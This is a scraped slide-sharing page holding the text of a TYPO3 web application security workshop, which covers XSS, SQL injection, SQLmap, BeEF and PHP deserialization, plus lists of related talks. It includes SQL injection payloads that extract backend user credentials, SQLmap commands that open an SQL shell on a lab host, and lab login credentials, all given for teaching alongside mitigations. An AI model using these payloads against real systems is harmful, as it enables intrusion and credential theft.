T3DD23 Content Security Policy - Concept, Strategies & PitfallsOliver Hader
 
CYBER SECURITY WORKSHOP (Only For Educational Purpose)
CYBER SECURITY WORKSHOP (Only For Educational Purpose)CYBER SECURITY WORKSHOP (Only For Educational Purpose)
CYBER SECURITY WORKSHOP (Only For Educational Purpose)Chanaka Lasantha
 
Getting to Know Security and Devs: Keys to Successful DevSecOps
Getting to Know Security and Devs: Keys to Successful DevSecOpsGetting to Know Security and Devs: Keys to Successful DevSecOps
Getting to Know Security and Devs: Keys to Successful DevSecOpsFranklin Mosley
 
Widespread security flaws in web application development 2015
Widespread security flaws in web application development 2015Widespread security flaws in web application development 2015
Widespread security flaws in web application development 2015mahchiev
 
The security phoenix - from the ashes of DEV-OPS Appsec California 2020
The security phoenix - from the ashes of DEV-OPS Appsec California 2020The security phoenix - from the ashes of DEV-OPS Appsec California 2020
The security phoenix - from the ashes of DEV-OPS Appsec California 2020NSC42 Ltd
 
Cyber Security Workshop @SPIT- 3rd October 2015
Cyber Security Workshop @SPIT- 3rd October 2015Cyber Security Workshop @SPIT- 3rd October 2015
Cyber Security Workshop @SPIT- 3rd October 2015Nilesh Sapariya
 
Network Hacking Training - Course Gate
Network Hacking Training - Course GateNetwork Hacking Training - Course Gate
Network Hacking Training - Course GateCourse Gate
 
How to Incorporate a Security-First Approach to Your Products by spiderSlik C...
How to Incorporate a Security-First Approach to Your Products by spiderSlik C...How to Incorporate a Security-First Approach to Your Products by spiderSlik C...
How to Incorporate a Security-First Approach to Your Products by spiderSlik C...Product School
 
ITCamp 2018 - Tobiasz Koprowski - SECDEV(OPS). How to Brace Your IT Security.
ITCamp 2018 - Tobiasz Koprowski - SECDEV(OPS). How to Brace Your IT Security.ITCamp 2018 - Tobiasz Koprowski - SECDEV(OPS). How to Brace Your IT Security.
ITCamp 2018 - Tobiasz Koprowski - SECDEV(OPS). How to Brace Your IT Security.ITCamp
 
"Designing Secure Infrastructure for High Growth Product" by Rendra Perdana (...
"Designing Secure Infrastructure for High Growth Product" by Rendra Perdana (..."Designing Secure Infrastructure for High Growth Product" by Rendra Perdana (...
"Designing Secure Infrastructure for High Growth Product" by Rendra Perdana (...Tech in Asia ID
 
Who owns Software Security
Who owns Software SecurityWho owns Software Security
Who owns Software SecuritydevObjective
 
TWISummit 2019 - Build Security In
TWISummit 2019 - Build Security InTWISummit 2019 - Build Security In
TWISummit 2019 - Build Security InThoughtworks
 
Overcoming the old ways of working with DevSecOps - Culture, Data, Graph, and...
Overcoming the old ways of working with DevSecOps - Culture, Data, Graph, and...Overcoming the old ways of working with DevSecOps - Culture, Data, Graph, and...
Overcoming the old ways of working with DevSecOps - Culture, Data, Graph, and...Erkang Zheng
 
Porque las Amenazas avanzadas requieren de una Seguridad para Aplicaciones av...
Porque las Amenazas avanzadas requieren de una Seguridad para Aplicaciones av...Porque las Amenazas avanzadas requieren de una Seguridad para Aplicaciones av...
Porque las Amenazas avanzadas requieren de una Seguridad para Aplicaciones av...Cristian Garcia G.
 
Common Security Misconception
Common Security MisconceptionCommon Security Misconception
Common Security MisconceptionMatthew Ong
 
Nsc42 the security phoenix
Nsc42 the security phoenixNsc42 the security phoenix
Nsc42 the security phoenixNSC42 Ltd
 
Demystify Information Security & Threats for Data-Driven Platforms With Cheta...
Demystify Information Security & Threats for Data-Driven Platforms With Cheta...Demystify Information Security & Threats for Data-Driven Platforms With Cheta...
Demystify Information Security & Threats for Data-Driven Platforms With Cheta...Chetan Khatri
 
Mitre ATT&CK by Mattias Almeflo Nixu
Mitre ATT&CK by Mattias Almeflo NixuMitre ATT&CK by Mattias Almeflo Nixu
Mitre ATT&CK by Mattias Almeflo NixuNixu Corporation
 

Similar a Web Application Security Workshop (T3DD19) (20)

Hacking TYPO3 v9 (T3DD19 edition)
Hacking TYPO3 v9 (T3DD19 edition)Hacking TYPO3 v9 (T3DD19 edition)
Hacking TYPO3 v9 (T3DD19 edition)
 
T3DD23 Content Security Policy - Concept, Strategies & Pitfalls
T3DD23 Content Security Policy - Concept, Strategies & PitfallsT3DD23 Content Security Policy - Concept, Strategies & Pitfalls
T3DD23 Content Security Policy - Concept, Strategies & Pitfalls
 
CYBER SECURITY WORKSHOP (Only For Educational Purpose)
CYBER SECURITY WORKSHOP (Only For Educational Purpose)CYBER SECURITY WORKSHOP (Only For Educational Purpose)
CYBER SECURITY WORKSHOP (Only For Educational Purpose)
 
Getting to Know Security and Devs: Keys to Successful DevSecOps
Getting to Know Security and Devs: Keys to Successful DevSecOpsGetting to Know Security and Devs: Keys to Successful DevSecOps
Getting to Know Security and Devs: Keys to Successful DevSecOps
 
Widespread security flaws in web application development 2015
Widespread security flaws in web application development 2015Widespread security flaws in web application development 2015
Widespread security flaws in web application development 2015
 
The security phoenix - from the ashes of DEV-OPS Appsec California 2020
The security phoenix - from the ashes of DEV-OPS Appsec California 2020The security phoenix - from the ashes of DEV-OPS Appsec California 2020
The security phoenix - from the ashes of DEV-OPS Appsec California 2020
 
Cyber Security Workshop @SPIT- 3rd October 2015
Cyber Security Workshop @SPIT- 3rd October 2015Cyber Security Workshop @SPIT- 3rd October 2015
Cyber Security Workshop @SPIT- 3rd October 2015
 
Network Hacking Training - Course Gate
Network Hacking Training - Course GateNetwork Hacking Training - Course Gate
Network Hacking Training - Course Gate
 
How to Incorporate a Security-First Approach to Your Products by spiderSlik C...
How to Incorporate a Security-First Approach to Your Products by spiderSlik C...How to Incorporate a Security-First Approach to Your Products by spiderSlik C...
How to Incorporate a Security-First Approach to Your Products by spiderSlik C...
 
ITCamp 2018 - Tobiasz Koprowski - SECDEV(OPS). How to Brace Your IT Security.
ITCamp 2018 - Tobiasz Koprowski - SECDEV(OPS). How to Brace Your IT Security.ITCamp 2018 - Tobiasz Koprowski - SECDEV(OPS). How to Brace Your IT Security.
ITCamp 2018 - Tobiasz Koprowski - SECDEV(OPS). How to Brace Your IT Security.
 
"Designing Secure Infrastructure for High Growth Product" by Rendra Perdana (...
"Designing Secure Infrastructure for High Growth Product" by Rendra Perdana (..."Designing Secure Infrastructure for High Growth Product" by Rendra Perdana (...
"Designing Secure Infrastructure for High Growth Product" by Rendra Perdana (...
 
Who owns Software Security
Who owns Software SecurityWho owns Software Security
Who owns Software Security
 
Who Owns Software Security?
Who Owns Software Security?Who Owns Software Security?
Who Owns Software Security?
 
TWISummit 2019 - Build Security In
TWISummit 2019 - Build Security InTWISummit 2019 - Build Security In
TWISummit 2019 - Build Security In
 
Overcoming the old ways of working with DevSecOps - Culture, Data, Graph, and...
Overcoming the old ways of working with DevSecOps - Culture, Data, Graph, and...Overcoming the old ways of working with DevSecOps - Culture, Data, Graph, and...
Overcoming the old ways of working with DevSecOps - Culture, Data, Graph, and...
 
Porque las Amenazas avanzadas requieren de una Seguridad para Aplicaciones av...
Porque las Amenazas avanzadas requieren de una Seguridad para Aplicaciones av...Porque las Amenazas avanzadas requieren de una Seguridad para Aplicaciones av...
Porque las Amenazas avanzadas requieren de una Seguridad para Aplicaciones av...
 
Common Security Misconception
Common Security MisconceptionCommon Security Misconception
Common Security Misconception
 
Nsc42 the security phoenix
Nsc42 the security phoenixNsc42 the security phoenix
Nsc42 the security phoenix
 
Demystify Information Security & Threats for Data-Driven Platforms With Cheta...
Demystify Information Security & Threats for Data-Driven Platforms With Cheta...Demystify Information Security & Threats for Data-Driven Platforms With Cheta...
Demystify Information Security & Threats for Data-Driven Platforms With Cheta...
 
Mitre ATT&CK by Mattias Almeflo Nixu
Mitre ATT&CK by Mattias Almeflo NixuMitre ATT&CK by Mattias Almeflo Nixu
Mitre ATT&CK by Mattias Almeflo Nixu
 

Más de Oliver Hader

SAST für TYPO3 Extensions
SAST für TYPO3 ExtensionsSAST für TYPO3 Extensions
SAST für TYPO3 ExtensionsOliver Hader
 
TYPO3camp Munich 2018 - Keynote - "Wo woll'n mer denn hin?"
TYPO3camp Munich 2018 - Keynote - "Wo woll'n mer denn hin?"TYPO3camp Munich 2018 - Keynote - "Wo woll'n mer denn hin?"
TYPO3camp Munich 2018 - Keynote - "Wo woll'n mer denn hin?"Oliver Hader
 
TYPO3 CMS - Datenmodifikation & Event Sourcing (Masterarbeit)
TYPO3 CMS - Datenmodifikation & Event Sourcing (Masterarbeit)TYPO3 CMS - Datenmodifikation & Event Sourcing (Masterarbeit)
TYPO3 CMS - Datenmodifikation & Event Sourcing (Masterarbeit)Oliver Hader
 
TYPO3 Event Sourcing
TYPO3 Event SourcingTYPO3 Event Sourcing
TYPO3 Event SourcingOliver Hader
 
H4CK1N6 - Web Application Security
H4CK1N6 - Web Application SecurityH4CK1N6 - Web Application Security
H4CK1N6 - Web Application SecurityOliver Hader
 
TYPO3 Backstage Development
TYPO3 Backstage DevelopmentTYPO3 Backstage Development
TYPO3 Backstage DevelopmentOliver Hader
 
Vor- und Nachteile von Web Components mit Polymer gegenüber AngularJS ohne P...
Vor- und Nachteile von Web Components mit Polymer gegenüber AngularJS ohne P...Vor- und Nachteile von Web Components mit Polymer gegenüber AngularJS ohne P...
Vor- und Nachteile von Web Components mit Polymer gegenüber AngularJS ohne P...Oliver Hader
 
WebGL - 3D im Browser - Erfahrungsbericht mit BabylonJS
WebGL - 3D im Browser - Erfahrungsbericht mit BabylonJSWebGL - 3D im Browser - Erfahrungsbericht mit BabylonJS
WebGL - 3D im Browser - Erfahrungsbericht mit BabylonJSOliver Hader
 
Web application security
Web application securityWeb application security
Web application securityOliver Hader
 
Contribute to TYPO3 CMS
Contribute to TYPO3 CMSContribute to TYPO3 CMS
Contribute to TYPO3 CMSOliver Hader
 
T3CON13DE - TYPO3 CMS Team
T3CON13DE - TYPO3 CMS TeamT3CON13DE - TYPO3 CMS Team
T3CON13DE - TYPO3 CMS TeamOliver Hader
 
TYPO3camp Regensburg: TYPO3 6.0
TYPO3camp Regensburg: TYPO3 6.0TYPO3camp Regensburg: TYPO3 6.0
TYPO3camp Regensburg: TYPO3 6.0Oliver Hader
 
TYPO3 Inline Relational Record Editing (IRRE)
TYPO3 Inline Relational Record Editing (IRRE)TYPO3 Inline Relational Record Editing (IRRE)
TYPO3 Inline Relational Record Editing (IRRE)Oliver Hader
 
TYPO3 4.6 & TYPO3 4.7
TYPO3 4.6 & TYPO3 4.7TYPO3 4.6 & TYPO3 4.7
TYPO3 4.6 & TYPO3 4.7Oliver Hader
 

Más de Oliver Hader (15)

SAST für TYPO3 Extensions
SAST für TYPO3 ExtensionsSAST für TYPO3 Extensions
SAST für TYPO3 Extensions
 
TYPO3camp Munich 2018 - Keynote - "Wo woll'n mer denn hin?"
TYPO3camp Munich 2018 - Keynote - "Wo woll'n mer denn hin?"TYPO3camp Munich 2018 - Keynote - "Wo woll'n mer denn hin?"
TYPO3camp Munich 2018 - Keynote - "Wo woll'n mer denn hin?"
 
TYPO3 CMS - Datenmodifikation & Event Sourcing (Masterarbeit)
TYPO3 CMS - Datenmodifikation & Event Sourcing (Masterarbeit)TYPO3 CMS - Datenmodifikation & Event Sourcing (Masterarbeit)
TYPO3 CMS - Datenmodifikation & Event Sourcing (Masterarbeit)
 
TYPO3 Event Sourcing
TYPO3 Event SourcingTYPO3 Event Sourcing
TYPO3 Event Sourcing
 
H4CK1N6 - Web Application Security
H4CK1N6 - Web Application SecurityH4CK1N6 - Web Application Security
H4CK1N6 - Web Application Security
 
TYPO3 Backstage Development
TYPO3 Backstage DevelopmentTYPO3 Backstage Development
TYPO3 Backstage Development
 
Vor- und Nachteile von Web Components mit Polymer gegenüber AngularJS ohne P...
Vor- und Nachteile von Web Components mit Polymer gegenüber AngularJS ohne P...Vor- und Nachteile von Web Components mit Polymer gegenüber AngularJS ohne P...
Vor- und Nachteile von Web Components mit Polymer gegenüber AngularJS ohne P...
 
WebGL - 3D im Browser - Erfahrungsbericht mit BabylonJS
WebGL - 3D im Browser - Erfahrungsbericht mit BabylonJSWebGL - 3D im Browser - Erfahrungsbericht mit BabylonJS
WebGL - 3D im Browser - Erfahrungsbericht mit BabylonJS
 
Web Components
Web ComponentsWeb Components
Web Components
 
Web application security
Web application securityWeb application security
Web application security
 
Contribute to TYPO3 CMS
Contribute to TYPO3 CMSContribute to TYPO3 CMS
Contribute to TYPO3 CMS
 
T3CON13DE - TYPO3 CMS Team
T3CON13DE - TYPO3 CMS TeamT3CON13DE - TYPO3 CMS Team
T3CON13DE - TYPO3 CMS Team
 
TYPO3camp Regensburg: TYPO3 6.0
TYPO3camp Regensburg: TYPO3 6.0TYPO3camp Regensburg: TYPO3 6.0
TYPO3camp Regensburg: TYPO3 6.0
 
TYPO3 Inline Relational Record Editing (IRRE)
TYPO3 Inline Relational Record Editing (IRRE)TYPO3 Inline Relational Record Editing (IRRE)
TYPO3 Inline Relational Record Editing (IRRE)
 
TYPO3 4.6 & TYPO3 4.7
TYPO3 4.6 & TYPO3 4.7TYPO3 4.6 & TYPO3 4.7
TYPO3 4.6 & TYPO3 4.7
 

Último

Advantages of Hiring UIUX Design Service Providers for Your Business
Advantages of Hiring UIUX Design Service Providers for Your BusinessAdvantages of Hiring UIUX Design Service Providers for Your Business
Advantages of Hiring UIUX Design Service Providers for Your BusinessPixlogix Infotech
 
The Role of Taxonomy and Ontology in Semantic Layers - Heather Hedden.pdf
The Role of Taxonomy and Ontology in Semantic Layers - Heather Hedden.pdfThe Role of Taxonomy and Ontology in Semantic Layers - Heather Hedden.pdf
The Role of Taxonomy and Ontology in Semantic Layers - Heather Hedden.pdfEnterprise Knowledge
 
Boost PC performance: How more available memory can improve productivity
Boost PC performance: How more available memory can improve productivityBoost PC performance: How more available memory can improve productivity
Boost PC performance: How more available memory can improve productivityPrincipled Technologies
 
Driving Behavioral Change for Information Management through Data-Driven Gree...
Driving Behavioral Change for Information Management through Data-Driven Gree...Driving Behavioral Change for Information Management through Data-Driven Gree...
Driving Behavioral Change for Information Management through Data-Driven Gree...Enterprise Knowledge
 
Slack Application Development 101 Slides
Slack Application Development 101 SlidesSlack Application Development 101 Slides
Slack Application Development 101 Slidespraypatel2
 
Exploring the Future Potential of AI-Enabled Smartphone Processors
Exploring the Future Potential of AI-Enabled Smartphone ProcessorsExploring the Future Potential of AI-Enabled Smartphone Processors
Exploring the Future Potential of AI-Enabled Smartphone Processorsdebabhi2
 
Boost Fertility New Invention Ups Success Rates.pdf
Boost Fertility New Invention Ups Success Rates.pdfBoost Fertility New Invention Ups Success Rates.pdf
Boost Fertility New Invention Ups Success Rates.pdfsudhanshuwaghmare1
 
Real Time Object Detection Using Open CV
Real Time Object Detection Using Open CVReal Time Object Detection Using Open CV
Real Time Object Detection Using Open CVKhem
 
What Are The Drone Anti-jamming Systems Technology?
What Are The Drone Anti-jamming Systems Technology?What Are The Drone Anti-jamming Systems Technology?
What Are The Drone Anti-jamming Systems Technology?Antenna Manufacturer Coco
 
From Event to Action: Accelerate Your Decision Making with Real-Time Automation
From Event to Action: Accelerate Your Decision Making with Real-Time AutomationFrom Event to Action: Accelerate Your Decision Making with Real-Time Automation
From Event to Action: Accelerate Your Decision Making with Real-Time AutomationSafe Software
 
Presentation on how to chat with PDF using ChatGPT code interpreter
Presentation on how to chat with PDF using ChatGPT code interpreterPresentation on how to chat with PDF using ChatGPT code interpreter
Presentation on how to chat with PDF using ChatGPT code interpreternaman860154
 
Automating Google Workspace (GWS) & more with Apps Script
Automating Google Workspace (GWS) & more with Apps ScriptAutomating Google Workspace (GWS) & more with Apps Script
Automating Google Workspace (GWS) & more with Apps Scriptwesley chun
 
A Call to Action for Generative AI in 2024
A Call to Action for Generative AI in 2024A Call to Action for Generative AI in 2024
A Call to Action for Generative AI in 2024Results
 
How to convert PDF to text with Nanonets
How to convert PDF to text with NanonetsHow to convert PDF to text with Nanonets
How to convert PDF to text with Nanonetsnaman860154
 
[2024]Digital Global Overview Report 2024 Meltwater.pdf
[2024]Digital Global Overview Report 2024 Meltwater.pdf[2024]Digital Global Overview Report 2024 Meltwater.pdf
[2024]Digital Global Overview Report 2024 Meltwater.pdfhans926745
 
Scaling API-first – The story of a global engineering organization
Scaling API-first – The story of a global engineering organizationScaling API-first – The story of a global engineering organization
Scaling API-first – The story of a global engineering organizationRadu Cotescu
 
Understanding Discord NSFW Servers A Guide for Responsible Users.pdf
Understanding Discord NSFW Servers A Guide for Responsible Users.pdfUnderstanding Discord NSFW Servers A Guide for Responsible Users.pdf
Understanding Discord NSFW Servers A Guide for Responsible Users.pdfUK Journal
 
How to Troubleshoot Apps for the Modern Connected Worker
How to Troubleshoot Apps for the Modern Connected WorkerHow to Troubleshoot Apps for the Modern Connected Worker
How to Troubleshoot Apps for the Modern Connected WorkerThousandEyes
 
The 7 Things I Know About Cyber Security After 25 Years | April 2024
The 7 Things I Know About Cyber Security After 25 Years | April 2024The 7 Things I Know About Cyber Security After 25 Years | April 2024
The 7 Things I Know About Cyber Security After 25 Years | April 2024Rafal Los
 
The Codex of Business Writing Software for Real-World Solutions 2.pptx
The Codex of Business Writing Software for Real-World Solutions 2.pptxThe Codex of Business Writing Software for Real-World Solutions 2.pptx
The Codex of Business Writing Software for Real-World Solutions 2.pptxMalak Abu Hammad
 

Último (20)

Advantages of Hiring UIUX Design Service Providers for Your Business
Advantages of Hiring UIUX Design Service Providers for Your BusinessAdvantages of Hiring UIUX Design Service Providers for Your Business
Advantages of Hiring UIUX Design Service Providers for Your Business
 
The Role of Taxonomy and Ontology in Semantic Layers - Heather Hedden.pdf
The Role of Taxonomy and Ontology in Semantic Layers - Heather Hedden.pdfThe Role of Taxonomy and Ontology in Semantic Layers - Heather Hedden.pdf
The Role of Taxonomy and Ontology in Semantic Layers - Heather Hedden.pdf
 
Boost PC performance: How more available memory can improve productivity
Boost PC performance: How more available memory can improve productivityBoost PC performance: How more available memory can improve productivity
Boost PC performance: How more available memory can improve productivity
 
Driving Behavioral Change for Information Management through Data-Driven Gree...
Driving Behavioral Change for Information Management through Data-Driven Gree...Driving Behavioral Change for Information Management through Data-Driven Gree...
Driving Behavioral Change for Information Management through Data-Driven Gree...
 
Slack Application Development 101 Slides
Slack Application Development 101 SlidesSlack Application Development 101 Slides
Slack Application Development 101 Slides
 
Exploring the Future Potential of AI-Enabled Smartphone Processors
Exploring the Future Potential of AI-Enabled Smartphone ProcessorsExploring the Future Potential of AI-Enabled Smartphone Processors
Exploring the Future Potential of AI-Enabled Smartphone Processors
 
Boost Fertility New Invention Ups Success Rates.pdf
Boost Fertility New Invention Ups Success Rates.pdfBoost Fertility New Invention Ups Success Rates.pdf
Boost Fertility New Invention Ups Success Rates.pdf
 
Real Time Object Detection Using Open CV
Real Time Object Detection Using Open CVReal Time Object Detection Using Open CV
Real Time Object Detection Using Open CV
 
What Are The Drone Anti-jamming Systems Technology?
What Are The Drone Anti-jamming Systems Technology?What Are The Drone Anti-jamming Systems Technology?
What Are The Drone Anti-jamming Systems Technology?
 
From Event to Action: Accelerate Your Decision Making with Real-Time Automation
From Event to Action: Accelerate Your Decision Making with Real-Time AutomationFrom Event to Action: Accelerate Your Decision Making with Real-Time Automation
From Event to Action: Accelerate Your Decision Making with Real-Time Automation
 
Presentation on how to chat with PDF using ChatGPT code interpreter
Presentation on how to chat with PDF using ChatGPT code interpreterPresentation on how to chat with PDF using ChatGPT code interpreter
Presentation on how to chat with PDF using ChatGPT code interpreter
 
Automating Google Workspace (GWS) & more with Apps Script
Automating Google Workspace (GWS) & more with Apps ScriptAutomating Google Workspace (GWS) & more with Apps Script
Automating Google Workspace (GWS) & more with Apps Script
 
A Call to Action for Generative AI in 2024
A Call to Action for Generative AI in 2024A Call to Action for Generative AI in 2024
A Call to Action for Generative AI in 2024
 
How to convert PDF to text with Nanonets
How to convert PDF to text with NanonetsHow to convert PDF to text with Nanonets
How to convert PDF to text with Nanonets
 
[2024]Digital Global Overview Report 2024 Meltwater.pdf
[2024]Digital Global Overview Report 2024 Meltwater.pdf[2024]Digital Global Overview Report 2024 Meltwater.pdf
[2024]Digital Global Overview Report 2024 Meltwater.pdf
 
Scaling API-first – The story of a global engineering organization
Scaling API-first – The story of a global engineering organizationScaling API-first – The story of a global engineering organization
Scaling API-first – The story of a global engineering organization
 
Understanding Discord NSFW Servers A Guide for Responsible Users.pdf
Understanding Discord NSFW Servers A Guide for Responsible Users.pdfUnderstanding Discord NSFW Servers A Guide for Responsible Users.pdf
Understanding Discord NSFW Servers A Guide for Responsible Users.pdf
 
How to Troubleshoot Apps for the Modern Connected Worker
How to Troubleshoot Apps for the Modern Connected WorkerHow to Troubleshoot Apps for the Modern Connected Worker
How to Troubleshoot Apps for the Modern Connected Worker
 
The 7 Things I Know About Cyber Security After 25 Years | April 2024
The 7 Things I Know About Cyber Security After 25 Years | April 2024The 7 Things I Know About Cyber Security After 25 Years | April 2024
The 7 Things I Know About Cyber Security After 25 Years | April 2024
 
The Codex of Business Writing Software for Real-World Solutions 2.pptx
The Codex of Business Writing Software for Real-World Solutions 2.pptxThe Codex of Business Writing Software for Real-World Solutions 2.pptx
The Codex of Business Writing Software for Real-World Solutions 2.pptx
 

Web Application Security Workshop (T3DD19)

  • 1. Web Application Security Workshop Oliver Hader oliver@typo3.org @ohader TYPO3 Developer Days 2019 August 4th, 2019
  • 2. TYPO3 Developer Days 2019 - Web Application Security Workshop - oliver.hader@typo3.org 2 ▪Research & Development ▪Security Team Lead ▪50% TYPO3 GmbH ▪50% freelance software engineer ▪#hof #cycling #paramedic #in.die.musik ~# whoami Oliver Hader @ohader
  • 3. TYPO3 Developer Days 2019 - Web Application Security Workshop - oliver.hader@typo3.org 3 ▪ session probably recorded ▪ real attack vectors are shown ▪ hackers probably knew already ▪ official security fixes available ▪ report to security@typo3.org Disclaimer
  • 4. TYPO3 Developer Days 2019 - Web Application Security Workshop - oliver.hader@typo3.org Agenda 4 ▪ Attack technique basics (XSS, SQLi, deserialization) ▪ Attack tools/simulation (SQLmap, BeEF, BoNeSi) ▪ Phar Stream Vulnerability & Wrapper ▪ CVSSv3 vulnerability scoring ▪ TYPO3 Security Team ▪ Capture the Flag Agenda ⏳
  • 5. What is your agenda? Do you have questions? 5TYPO3 Developer Days 2019 - Hacking TYPO3 - oliver.hader@typo3.org
  • 6. TYPO3 Developer Days 2019 - Web Application Security Workshop - oliver.hader@typo3.org Web Application Security Basics 6
  • 7. TYPO3 Developer Days 2019 - Web Application Security Workshop - oliver.hader@typo3.org Web Application Security 7 ▪ CIA/compliance triad ▪ confidentiality ▪ private, personal, sensitive information ▪ integrity ▪ manipulation of information (“fake news”) ▪ availability ▪ denial of service ▪ online bank account ▪ blocking information flow https://www.ibm.com/blogs/cloud-computing/2018/01/16/drive-compliance-cloud/
  • 8. TYPO3 Developer Days 2019 - Web Application Security Workshop - oliver.hader@typo3.org 8 Hacking Playground CONFIDENTIALITY - unauthorised access to information
  • 9. TYPO3 Developer Days 2019 - Web Application Security Workshop - oliver.hader@typo3.org 9 Hacking Playground INTEGRITY - e.g. manipulated information
  • 10. TYPO3 Developer Days 2019 - Web Application Security Workshop - oliver.hader@typo3.org 10 Hacking Playground AVAILABILITY - information/service not available
  • 11. TYPO3 Developer Days 2019 - Web Application Security Workshop - oliver.hader@typo3.org 11 Web Application Security Open Web Application Security Project - TOP 10 vulnerabilities https://www.owasp.org/images/7/72/OWASP_Top_10-2017_%28en%29.pdf.pdf TYPO3 core TYPO3 3rd party extensionsPHP world TYPO3vulnerabilitiesinpast5years
  • 12. TYPO3 Developer Days 2019 - Web Application Security Workshop - oliver.hader@typo3.org 12 Web Application Security attack chains - multiple components might be affected https://www.owasp.org/images/7/72/OWASP_Top_10-2017_%28en%29.pdf.pdf
  • 14. TYPO3 Developer Days 2019 - Web Application Security Workshop - oliver.hader@typo3.org Techniques, Mitigation, Tools 14
  • 15. Cross-Site Scripting 15TYPO3 Developer Days 2019 - Hacking TYPO3 - oliver.hader@typo3.org
  • 16. TYPO3 Developer Days 2019 - Web Application Security Workshop - oliver.hader@typo3.org 16 Cross-Site Scripting - basics “classic” XSS
  • 17. TYPO3 Developer Days 2019 - Web Application Security Workshop - oliver.hader@typo3.org 17 Cross-Site Scripting - basics XSS vectors - more at https://www.owasp.org/index.php/XSS_Filter_Evasion_Cheat_Sheet
  • 18. TYPO3 Developer Days 2019 - Web Application Security Workshop - oliver.hader@typo3.org 18 Cross-Site Scripting - basics “classic” XSS mitigation ✔
  • 19. TYPO3 Developer Days 2019 - Web Application Security Workshop - oliver.hader@typo3.org 19 Cross-Site Scripting - basics XSS with Fluid - f:format.html relies on TypoScript being available
  • 20. TYPO3 Developer Days 2019 - Web Application Security Workshop - oliver.hader@typo3.org 20 Cross-Site Scripting - basics ViewHelper without any escaping == potentially vulnerable to XSS
  • 21. TYPO3 Developer Days 2019 - Web Application Security Workshop - oliver.hader@typo3.org 21 http://typo3v9-hack.ddev.site:3000/ui/panel // admin & joh316
  • 22. TYPO3 Developer Days 2019 - Web Application Security Workshop - oliver.hader@typo3.org 22 XSS exploitation
  • 23. TYPO3 Developer Days 2019 - Web Application Security Workshop - oliver.hader@typo3.org 23 Browser Exploitation Framework in action
  • 24. TYPO3 Developer Days 2019 - Web Application Security Workshop - oliver.hader@typo3.org 24 Browser Exploitation Framework in action
  • 25. SQL injection 25TYPO3 Developer Days 2019 - Hacking TYPO3 - oliver.hader@typo3.org
  • 26. TYPO3 Developer Days 2019 - Web Application Security Workshop - oliver.hader@typo3.org 26 SQL injection basics “classic” SQL injection - query
  • 27. TYPO3 Developer Days 2019 - Web Application Security Workshop - oliver.hader@typo3.org SQL injection basics 27 ▪ SELECT … WHERE uid=10 AND pid>0; ▪ SELECT … WHERE uid=10 AND 1=1 -- AND pid>0; // bool true ▪ SELECT … WHERE uid=10 AND 1=0 -- AND pid>0; // bool false ▪ SELECT … WHERE uid=10 AND SLEEP(10) -- AND pid>0; // time ▪ comment literals (MySQL) ▪ -- ▪ # ▪ /* data */
  • 28. TYPO3 Developer Days 2019 - Web Application Security Workshop - oliver.hader@typo3.org SQL injection basics 28 ▪ SELECT … WHERE uid=10 AND pid>0; ▪ SELECT uid,pid,header WHERE uid=10 
 UNION SELECT username,password,3 
 FROM be_users WHERE SUBSTR(username, 1, 1) = ‘a’ 
 LIMIT 1,1 
 -- AND pid>0; ▪ … FROM be_users WHERE SUBSTR(username, 2, 1) = ‘d’ … ▪ … FROM be_users WHERE SUBSTR(username, 3, 1) = ‘m’ … ▪ … FROM be_users WHERE SUBSTR(username, 4, 1) = ‘i’ … ▪ … FROM be_users WHERE SUBSTR(username, 5, 1) = ’n’ …
  • 29. TYPO3 Developer Days 2019 - Web Application Security Workshop - oliver.hader@typo3.org 29 SQL injection QueryBuilder WHERE SELECT `uid`, `header` FROM `tt_content` WHERE `uid` = TEST;
  • 30. TYPO3 Developer Days 2019 - Web Application Security Workshop - oliver.hader@typo3.org 30 SQL injection QueryBuilder WHERE SELECT `uid`, `header` FROM `tt_content` WHERE `uid` = 0;
  • 31. TYPO3 Developer Days 2019 - Web Application Security Workshop - oliver.hader@typo3.org 31 SQL injection QueryBuilder WHERE (prepared statement) SELECT `uid`, `header` FROM `tt_content` WHERE `uid` = :dcValue1; ✔
  • 32. TYPO3 Developer Days 2019 - Web Application Security Workshop - oliver.hader@typo3.org 32 SQL injection QueryBuilder WHERE … WHERE `header` LIKE ‘%a%_%b%';
  • 33. TYPO3 Developer Days 2019 - Web Application Security Workshop - oliver.hader@typo3.org 33 SQL injection QueryBuilder WHERE … WHERE `header` LIKE ‘%a%_%b%’; ✔
  • 34. SQLmap 34TYPO3 Developer Days 2019 - Hacking TYPO3 - oliver.hader@typo3.org
  • 35. TYPO3 Developer Days 2019 - Web Application Security Workshop - oliver.hader@typo3.org 35 http://typo3v9-hack.ddev.site/?eID=comments&search=term
  • 36. TYPO3 Developer Days 2019 - Web Application Security Workshop - oliver.hader@typo3.org 36 ▪ ddev ssh -s sqlmap ▪ bash # suggested ▪ git checkout master ▪ git pull
  • 37. TYPO3 Developer Days 2019 - Web Application Security Workshop - oliver.hader@typo3.org 37 ▪ ./sqlmap -u '<uri>' ––risk 3 ––level 3 ––banner ▪ regular call ▪ ./sqlmap -u 'http://typo3v9-hack.ddev.site/? eID=comments&search=typo3*' ––risk 3 ––level 3 ––banner ▪ inside ddev container ▪ ./sqlmap -u 'http://web/?eID=comments&search=typo3*' ––risk 3 ––level 3 ––sql-shell # marker* in GET parameters ▪ ./sqlmap -u 'http://web/?eID=comments' ––data '&search=typo3*' ––risk 3 ––level 3 ––sql-shell # marker* in POST
  • 38. TYPO3 Developer Days 2019 - Web Application Security Workshop - oliver.hader@typo3.org 38 SQLmap
  • 39. TYPO3 Developer Days 2019 - Web Application Security Workshop - oliver.hader@typo3.org 39 meanwhile in /var/log/nginx/access.log
  • 40. TYPO3 Developer Days 2019 - Web Application Security Workshop - oliver.hader@typo3.org 40 possible SQL injection attack payload
  • 41. TYPO3 Developer Days 2019 - Web Application Security Workshop - oliver.hader@typo3.org 41 remote SQL shell via SQL injection
  • 42. TYPO3 Developer Days 2019 - Web Application Security Workshop - oliver.hader@typo3.org 42 “stacked queries” not allowed in PHP/PDO - SELECT …; INSERT …;
  • 43. Insecure Deserialization 43TYPO3 Developer Days 2019 - Hacking TYPO3 - oliver.hader@typo3.org
  • 44. TYPO3 Developer Days 2019 - Web Application Security Workshop - oliver.hader@typo3.org 44 Insecure Deserialization - Basics __destruct() or __wakeup() methods are executed on deserialization
  • 45. TYPO3 Developer Days 2019 - Web Application Security Workshop - oliver.hader@typo3.org 45 Insecure Deserialization - Basics user submitted payload to be deserialized
  • 46. TYPO3 Developer Days 2019 - Web Application Security Workshop - oliver.hader@typo3.org 46 allowed_classes introduced with PHP 7.0 (Polyfill available)
